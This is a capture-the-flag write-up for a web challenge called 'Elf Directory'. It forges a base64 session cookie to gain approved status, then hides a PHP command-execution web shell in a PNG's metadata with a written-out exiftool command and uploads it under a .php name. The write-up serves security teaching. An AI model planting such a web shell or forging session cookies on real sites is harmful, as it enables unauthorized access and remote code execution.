Skip to main content

Day 4: Elf Directory

challenge description
Can you infiltrate the Elf Directory to get a foothold inside Santa's data warehouse in the North Pole?


No source code this time. Let's poke at the application!

We are presented with a way to register and login. Upon login, we are informed that only authorised personnel can edit their profile... So sad.


Contact the admin elf? Ain't my username admin already? There must be a way the application is checking the status.


It seems like to maintain state, it uses PHP Session Cookies. It looks decodeable. Let's decode it on CyberChef.


Hmm.. What if I change the value of approved to true and replace the cookie to eyJ1c2VybmFtZSI6ImFkbWluIiwiYXBwcm92ZWQiOnRydWV9?


New upload functionality! Poking around, it strictly only allows PNG. No filename tricks here...

However, it does accept a filename of <name>.php though... Let's put the PHP script inside an actual image within the image metadata as a comment.

exiftool -Comment="<?php if(isset(\$_REQUEST['cmd'])){ echo \"<pre>\"; \$cmd = (\$_REQUEST['cmd']); system(\$cmd); echo \"</pre>\"; die; }?>" test.png

Next, before sending the image, we modify the filename in either Burp Suite or Firefox DevTools.

Now, we can browse to the image!


Viola. Now we just have to find the flag.